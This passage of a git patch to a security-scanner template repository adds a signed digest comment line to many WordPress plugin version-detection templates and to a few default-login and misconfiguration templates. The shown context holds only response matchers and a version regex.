+ http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 205 files changed, 205 insertions(+) diff --git a/http/default-logins/caprover/caprover-default-login.yaml b/http/default-logins/caprover/caprover-default-login.yaml index 9fc70b65fa..9283b1a827 100644 --- a/http/default-logins/caprover/caprover-default-login.yaml +++ b/http/default-logins/caprover/caprover-default-login.yaml @@ -32,3 +32,4 @@ http: - 'contains(header, "application/json")' - 'status_code == 200' condition: and +# digest: 490a0046304402204bdf83b16de402f0c591fab183bbd2f05b6bad96ca4cbc5d6383a0b3d5d99a52022068a6d61a5d5f63fa63a5ceb4e30974ae01daf30dcc15e6ef920763dfa0dc10c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/jeedom/jeedom-default-login.yaml b/http/default-logins/jeedom/jeedom-default-login.yaml index 3aab6e216d..47c07870a7 100644 --- a/http/default-logins/jeedom/jeedom-default-login.yaml +++ b/http/default-logins/jeedom/jeedom-default-login.yaml @@ -44,3 +44,4 @@ http: - "logout=1" - "Plugins" condition: and +# digest: 4a0a00473045022100d838f2114c2e5ad9fa46212ed4bde036770bbcc1d6f86e788eb2c472bc20b14f0220757a748fbfb0168ebf6df5b34ce6c2b8490928a8ddd47a17937ce345d4211253:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/configs/filestash-admin-config.yaml b/http/exposures/configs/filestash-admin-config.yaml index 3aa2de4983..402cdb55e6 100644 --- a/http/exposures/configs/filestash-admin-config.yaml +++ b/http/exposures/configs/filestash-admin-config.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4b0a004830460221008d18436adf95aef37bf555bd240b9f8fe6990a1c637624d206fcc7733673f62f02210085a8db22dccb1df2f164afa6ec88a3dc3d31ca327e6981d85122220a8634bfd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/forgejo-repo-exposure.yaml b/http/misconfiguration/forgejo-repo-exposure.yaml index a19178494c..0307212f22 100644 --- a/http/misconfiguration/forgejo-repo-exposure.yaml +++ b/http/misconfiguration/forgejo-repo-exposure.yaml @@ -30,3 +30,4 @@ http: - type: status status: - 200 +# digest: 490a004630440220323803a87fd83c16c741b5400f926a23ca34e01d18749f6a47449055f1e170b802203295a66f6e1f6c4a2cd0fce865372bd0994dab5180b4be4a8a55437fee2eb379:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/piwigo-installer.yaml b/http/misconfiguration/installer/piwigo-installer.yaml index fea6c9aac8..8a9db42c39 100644 --- a/http/misconfiguration/installer/piwigo-installer.yaml +++ b/http/misconfiguration/installer/piwigo-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100c382041d545e775c4b67e885b999f3ca6f2b8bcca34ccb81cdde7911f97c3271022011996dfc883994cdaea0c584ef2908ab4d9863744267250794a2b33119139e4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/poste-io-installer.yaml b/http/misconfiguration/installer/poste-io-installer.yaml index 3ad57c04f0..aa207d3199 100644 --- a/http/misconfiguration/installer/poste-io-installer.yaml +++ b/http/misconfiguration/installer/poste-io-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100da8af244ae67997355b3d9c3f502fd2f07889bc87e33b42656b83d9551a1e3a1022074bebb13f7565d53bf8bac225bad94cb311502f85a7849a721d369ef0176de6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..2b06578e27 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200857d8b76b2c77992248c3bf572659c3bf4e9798223fffbf1fe57d12a430c8a6022009f125d6d84762cbee235c12586cf55687cf386e78d49b006159ab41f2531a70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..176d4fa6f7 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210098c0583776bf21f845477770151d4fcccc91de97b76dedf7c9e63e5b71e42f10022100fa7622ddd63f625108a0acc00f803b4a845fe80db65bf8bdcfa89c57500483ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..024c61a679 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203b7c4f8970aef686fe0b8cb3de3be7f301c38271ea82d2d7ad1366593c8d9fbe0221008cf9df7cdc9ca95525fc7f7eb22f52d07cb60d48ec14a37308679be35294f11f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..392ed6d11a 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022061b3dded40f5ba100e4122f783a43d469c8a32f126a032b30a20f301f0c7291e022029f8af9dc2d8ae058710e5e7f0f7c206c83196152cca423218fb863dde71cd67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..0070c971bf 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008b475108addc0119fc7f09dd8a848269928d94e1bf227bdd9dea30341840cf7802203c2a0fd0b58f0c95244a0928b2345f913f02db2a06e6d30ef9ae12ed59455ba9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..55b77c0397 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100844139e9155d2fe45c92206c4ff572793e656b647ddeb486cbe96384baec8c890220488de7c36352d9624bf231939019a950e0ff1b577cac9e0e320e772d29ab7ae0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..b40bfa5dab 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ed7a84338113c11ebd16e732baa3fb228732d97adf6071f64a0b084e962b560e022100e042baa63a0e3b8c52bbf2d26b453c677fdb559b39a89bcdb468887279a0e48a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..5d8c489449 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a9f61bd827d31772a4e8877ec718a30d6cb168eda2a70e227d79f9534874d3480220329a01faa56e85d77cedd0a3fba33a323c47e0ea49fc91e4503cb1018021eff4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..d8ea047887 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202bb73401f79841ec144414192382de1dae87ef36f76b8dce65580c5d4911e37b022100c613a5707ff57a0b4371086f493511c64d5d7fd7af4597f50f19adffa2afce38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..a6a072cad6 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022055f9c9242ed8ea63a4b13a76f8ffff8c03e1cd0a299c70c3719ba1b46148a0e7022066b4ffb4e4f4a31c0c2b7637f2f73ef97a3cefd86cea2991e7f3c75a053bb574:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..cdb9c4291c 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203ce3dbbf5ddb8c033fa4faa86a7b009c69479eb90747e6677af6be539afc84730220120f3aa577e5d087e2ff2c7131510432795b3234da9416e432c728e0b78bdf73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..5465f8c403 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204bbc9717e02a0fb1f349efe96ad1fb18a337ecaa5a2ece7ab7f0980c3e7381b3022100a0483d3d42a29504bb0c5bee74b987b759aae2a96cc3d4f8e6277bd5cc2b4efb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..6cd942afda 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fcb905788449f283a34ec5bce91e4b883b27b995baec380c0020fba04e05434202202973baa3351e5706d82187475ef479d6399cff597f0365717d15f41e736872db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..a604c79f51 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c56d79d2859bffb06ca215005aabe0d576278a44de3737c09361227aec2e8e13022100c937807e1213a3ee6c3ec862ecb436e042d95080869de7be4c9e5a201515a3c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..1a158946fa 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202f49e8ed4f7fe6d0e7528e3461ed9a348379d270fa6c04ff82197aea47ed264702210084f93fa9c6e22594d20ebaea92d8f3b6332efc06ff9b79a688b83e83c9ee49c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..f584f360de 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e25cf3e9a7534c09ab979ec41cfd1d7be980deee679efc15978d4b96da2810e3022100956bf41456e8201f19307df6dbc3aeee3073cb0bd77f892958abeb6e929aebc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..93567fe139 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022058d26347b8df4dd691789f4a9144959718633b4ee4ed33e4c248bee0fc0b96bd0220424b410ef66eb4f52ff1589604cdb1792a2aa035f1748bc04a17623a220edc24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..92eea7f85e 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202f0a893d20ad887af064ae773d019520dd7559fb14ace584a2b6d3befe3ca3ce02202c6295081fd9fd8abd7f2c21c8b7bf45c661a26dd9b5275a15134f965ab5a0bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index f8691caf0a..fd08363c19 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220024bd34c32448960ab7c97549f611876c48fad3daa902df5273596db781535f4022100a53b6f59a74cfde552bb70bf5e50c311a7c5c21a8614f1d328e99e2b7468a85c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..53c029f784 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e280439b3dd1f38f74fc5fff5fc794da95682da1de6fe0501920c5f25d33f7d8022038a0bd0ac41515ebd920bdc39d8ec45060f24da0657e2982bb5b153f4863542d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..aef15aebd7 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100afb129792c0874ddf8ec6f21286105f6e1465eb166135a29da13ca1316ca89a00220429328c2ec2b306edb5f6368b3b277a33c0fd5b427c7dec5b7e5151d4de1283e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..b922eb0777 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ce1dff87e6fc363546ac94146da71a520d175174d1680b9cd376f4a2b6525b5e022100a113d8aabaa679c275bd7d272a32d3c07888ae2b7c8605cdaac85823cbf99ba8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..e54c4d0f85 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a0f080c0cf2613ebadb232a0029848c14f59fddb3c9c26fb1ea891f58906fba102201268ec9a06fdbbdda60d5cdae606edbe24814880d5ff44f6bf0d2a662e74dd1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..c32628d9eb 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022049bc063f3c2909c77ff1eb346dc52e3930badef7e5fda6b48e9a677d8227ea7302210096ad47052ab9f09d214dde88dbec98d42c4912d904aee78e84b9ba0de4c0526d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..62c1961d3d 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cacb85b80ecbc7066077ecc86b53b6f10ee209c12d1f0df73c0db36686c5aa53022009a20e93a30cb9fc2e63aa796fc1ea01ab4d7c204bac5724e2c13dcbfa49f637:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..1eb855a653 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207510353709a6cb05451c4789bafff5a4d2f66f546c43d1087d364b7484e96d7902202bad7084505170121f6fb26cce3ca2c0309f7a94ca2af20f4f1dd5aef2caa1ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..8f6f8c25f2 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206ab0f33ee98765022ed4b92eb65a3c1564c92ec1cb8959d80f0e7bb76c6de6710221009ef99b7328c219d764bfda31b8a7f3fe93660ece418526ad8a9d206e8ef91167:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..f4bc858bde 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100db93e752e345e74f729c574b2ae080e5ef04c854e330c6172c80e6fe68a3b3da022069ab24146edb0af052fa3177a991243faa11a7db522bf60190ea90b4e6ae2efd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..12b1f28120 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220109aa0c6f8858f4751cd611ec4baffd50feb2cdbd591606a51c75ef5fb8cdd8b022077eeb08d84ec1b8b6f8a26425429b643e3095e8fa3ae9395fbdd14236314c326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..a9bf94fee1 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220284c4c0ffdc8ee7957c3f5c6390776a048083033ba2edff60c974e376cc0d55e022100d760f22c5ffa6383be4f185ceebbbd56f852a1eee6215dfe0249daeeb8a9be3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..e0383aa328 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 